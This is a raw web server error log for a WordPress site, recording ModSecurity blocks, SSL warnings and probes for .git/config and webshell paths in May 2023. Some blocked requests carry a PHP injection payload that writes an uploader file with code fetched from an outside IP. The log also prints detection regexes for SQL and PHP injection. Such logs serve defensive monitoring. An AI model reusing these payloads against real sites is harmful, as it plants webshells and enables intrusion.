matches the server name [Tue May 16 03:26:28.117513 2023] [ssl:warn] [pid 31631:tid 140636725987200] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 16 07:27:41.271380 2023] [:error] [pid 32059:tid 140636388833024] [client 152.89.196.77:32930] [client 152.89.196.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/core-engine/index.php"] [unique_id "ZGN2vQapVzq4C3u0K9MygQAAAMo"] [Tue May 16 15:27:12.451444 2023] [:error] [pid 32059:tid 140636372047616] [client 152.89.196.77:56900] [client 152.89.196.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:p1. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:p1: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/wp-class.php"] [unique_id "ZGPnIAapVzq4C3u0K9NAQwAAAMw"] [Tue May 16 17:45:46.554101 2023] [ssl:warn] [pid 31631:tid 140636725987200] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 16 17:46:37.924095 2023] [ssl:warn] [pid 31631:tid 140636725987200] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 16 17:50:22.941823 2023] [:error] [pid 9012:tid 140636388833024] [client 5.188.62.76:40134] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZGQIrra384ubayZ757o9_QAAAIo"] [Tue May 16 22:14:26.672363 2023] [autoindex:error] [pid 9011:tid 140636304905984] [client 43.156.24.126:52338] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue May 16 22:41:28.104949 2023] [:error] [pid 9011:tid 140636355262208] [client 152.89.196.77:53452] [client 152.89.196.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:code. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:code: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/yuma-blogger/contact.php"] [unique_id "ZGRM6DF-WiWlRRSCr8WOcQAAAE4"] [Wed May 17 03:16:20.502182 2023] [ssl:warn] [pid 15865:tid 139919965886336] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 17 03:16:20.636046 2023] [ssl:warn] [pid 15866:tid 139919965886336] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 17 03:16:20.985092 2023] [ssl:warn] [pid 15866:tid 139919965886336] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 17 03:16:22.687320 2023] [ssl:warn] [pid 15866:tid 139919965886336] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 17 03:16:24.895251 2023] [ssl:warn] [pid 16499:tid 140339494262656] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 17 03:16:25.021935 2023] [ssl:warn] [pid 16500:tid 140339494262656] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 17 05:36:40.366146 2023] [:error] [pid 16791:tid 140339313641216] [client 152.89.196.77:43516] [client 152.89.196.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:p1. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:p1: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/shell20211028.php"] [unique_id "ZGSuOPGFsavlEtGHAlqRXwAAAMA"] [Wed May 17 10:07:45.574095 2023] [autoindex:error] [pid 16791:tid 140339138496256] [client 43.134.9.244:58404] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu May 18 02:16:31.643759 2023] [:error] [pid 16791:tid 140339288463104] [client 152.89.196.77:49358] [client 152.89.196.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/background-image-cropper/s_e.php"] [unique_id "ZGXQz_GFsavlEtGHAlqxMAAAAMM"] [Thu May 18 03:45:20.209097 2023] [ssl:warn] [pid 18570:tid 140020078307200] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu May 18 03:45:20.365738 2023] [ssl:warn] [pid 18571:tid 140020078307200] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu May 18 03:45:20.737113 2023] [ssl:warn] [pid 18571:tid 140020078307200] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu May 18 03:45:22.182998 2023] [ssl:warn] [pid 18571:tid 140020078307200] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu May 18 03:45:24.605819 2023] [ssl:warn] [pid 19018:tid 139875826325376] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu May 18 03:45:24.764732 2023] [ssl:warn] [pid 19019:tid 139875826325376] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu May 18 09:50:36.137628 2023] [:error] [pid 19041:tid 139875474962176] [client 152.89.196.77:41348] [client 152.89.196.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:css. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:css: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/myk.php"] [unique_id "ZGY7PJAA5J82lka6jcWSmgAAAIw"] [Thu May 18 13:19:00.105750 2023] [:error] [pid 19041:tid 139875483354880] [client 77.105.146.169:51524] [client 77.105.146.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "compatible-"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "ZGZsFJAA5J82lka6jcWWNQAAAIs"], referer: https://poesia-portuguesa.com/ [Thu May 18 13:19:00.567541 2023] [:error] [pid 19424:tid 139875382642432] [client 77.105.146.169:51526] [client 77.105.146.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "compatible-"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "ZGZsFGM9jlhgyPnipxddLAAAANc"], referer: https://poesia-portuguesa.com/ [Thu May 18 13:19:01.012758 2023] [:error] [pid 19424:tid 139875449784064] [client 77.105.146.169:51528] [client 77.105.146.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "compatible-"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "ZGZsFWM9jlhgyPnipxddLQAAAM8"], referer: https://poesia-portuguesa.com/ [Thu May 18 18:51:16.832398 2023] [autoindex:error] [pid 19424:tid 139875500140288] [client 20.168.66.0:40636] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu May 18 18:56:14.824963 2023] [ssl:warn] [pid 19019:tid 139875826325376] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri May 19 03:09:29.347639 2023] [:error] [pid 11812:tid 139875500140288] [client 152.89.196.77:34188] [client 152.89.196.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:code. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:code: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "ZGcuufDP4Q3p9p_HW9q9JgAAAMk"] [Fri May 19 03:16:42.606922 2023] [ssl:warn] [pid 8056:tid 140714717656960] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri May 19 03:16:42.755314 2023] [ssl:warn] [pid 8058:tid 140714717656960] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri May 19 03:16:43.010129 2023] [ssl:warn] [pid 8058:tid 140714717656960] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri May 19 03:16:44.454709 2023] [ssl:warn] [pid 8058:tid 140714717656960] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri May 19 03:16:48.102626 2023] [ssl:warn] [pid 8505:tid 140370200807296] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri May 19 03:16:48.232982 2023] [ssl:warn] [pid 8506:tid 140370200807296] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2023/05/19 13:58:33 [error] 8455#8455: *1421270 access forbidden by rule, client: 15.237.107.173, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sat May 20 00:37:35.310345 2023] [autoindex:error] [pid 9209:tid 140369782036224] [client 43.159.138.6:60968] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat May 20 03:21:19.190393 2023] [ssl:warn] [pid 25251:tid 140630562461568] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 20 03:21:19.345314 2023] [ssl:warn] [pid 25252:tid 140630562461568] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 20 03:21:19.576627 2023] [ssl:warn] [pid 25252:tid 140630562461568] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 20 03:21:21.108907 2023] [ssl:warn] [pid 25252:tid 140630562461568] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 20 03:21:23.544855 2023] [ssl:warn] [pid 25800:tid 140182634674048] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 20 03:21:23.820436 2023] [ssl:warn] [pid 25801:tid 140182634674048] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 20 15:40:42.056133 2023] [:error] [pid 26236:tid 140182237939456] [client 170.106.119.29:43062] [client 170.106.119.29] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZGkwSpSX3R6FllGekGOevwAAANE"], referer: www.google.com [Sun May 21 00:26:19.433402 2023] [ssl:warn] [pid 25801:tid 140182634674048] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun May 21 03:11:16.625695 2023] [ssl:warn] [pid 18423:tid 139716649523072] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun May 21 03:11:16.769934 2023] [ssl:warn] [pid 18424:tid 139716649523072] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun May 21 03:11:17.275547 2023] [ssl:warn] [pid 18424:tid 139716649523072] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun May 21 03:11:18.859139 2023] [ssl:warn] [pid 18424:tid 139716649523072] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun May 21 03:11:21.100097 2023] [ssl:warn] [pid 18843:tid 140015556286336] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun May 21 03:11:21.273263 2023] [ssl:warn] [pid 18844:tid 140015556286336] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun May 21 21:33:00.881118 2023] [ssl:warn] [pid 27782:tid 140643648112512] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun May 21 21:33:01.022637 2023] [ssl:warn] [pid 27783:tid 140643648112512] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon May 22 03:21:20.167435 2023] [ssl:warn] [pid 22046:tid 139943571203968] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon May 22 03:21:20.301489 2023] [ssl:warn] [pid 22047:tid 139943571203968] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon May 22 03:21:20.917551 2023] [ssl:warn] [pid 22047:tid 139943571203968] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon May 22 03:21:23.671505 2023] [ssl:warn] [pid 22047:tid 139943571203968] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon May 22 03:21:26.334077 2023] [ssl:warn] [pid 22465:tid 140641484363648] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon May 22 03:21:26.594865 2023] [ssl:warn] [pid 22466:tid 140641484363648] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon May 22 08:53:28.701590 2023] [ssl:warn] [pid 22466:tid 140641484363648] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 23 03:45:17.867005 2023] [ssl:warn] [pid 25792:tid 140401892411264] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 23 03:45:18.011706 2023] [ssl:warn] [pid 25793:tid 140401892411264] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 23 03:45:18.354602 2023] [ssl:warn] [pid 25793:tid 140401892411264] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 23 03:45:19.728922 2023] [ssl:warn] [pid 25793:tid 140401892411264] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 23 03:45:22.005146 2023] [ssl:warn] [pid 26209:tid 140294551852928] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 23 03:45:22.134309 2023] [ssl:warn] [pid 26210:tid 140294551852928] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 23 12:38:59.203295 2023] [autoindex:error] [pid 26232:tid 140294175524608] [client 43.153.21.62:39456] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue May 23 16:09:38.358879 2023] [:error] [pid 26232:tid 140294225880832] [client 49.51.199.173:49304] [client 49.51.199.173] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZG0rkn4_bgyGZqywjWugWAAAAIk"], referer: www.google.com 2023/05/23 20:32:48 [error] 26096#26096: *76312 access forbidden by rule, client: 185.220.101.82, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2023/05/23 20:32:49 [error] 26095#26095: *76314 access forbidden by rule, client: 185.220.103.4, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Tue May 23 22:09:34.708450 2023] [autoindex:error] [pid 26747:tid 140294276237056] [client 43.156.164.79:33790] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed May 24 03:25:44.241826 2023] [ssl:warn] [pid 19786:tid 140034785519488] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 24 03:25:44.381935 2023] [ssl:warn] [pid 19787:tid 140034785519488] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 24 03:25:44.616028 2023] [ssl:warn] [pid 19787:tid 140034785519488] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 24 03:25:47.006988 2023] [ssl:warn] [pid 19787:tid 140034785519488] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 24 03:25:49.326179 2023] [ssl:warn] [pid 20203:tid 140485191198592] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 24 03:25:49.458985 2023] [ssl:warn] [pid 20204:tid 140485191198592] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 24 03:25:50.102801 2023] [ssl:warn] [pid 20204:tid 140485191198592] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 24 08:43:41.753542 2023] [:error] [pid 1632:tid 140484831840000] [client 5.188.62.26:56838] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag 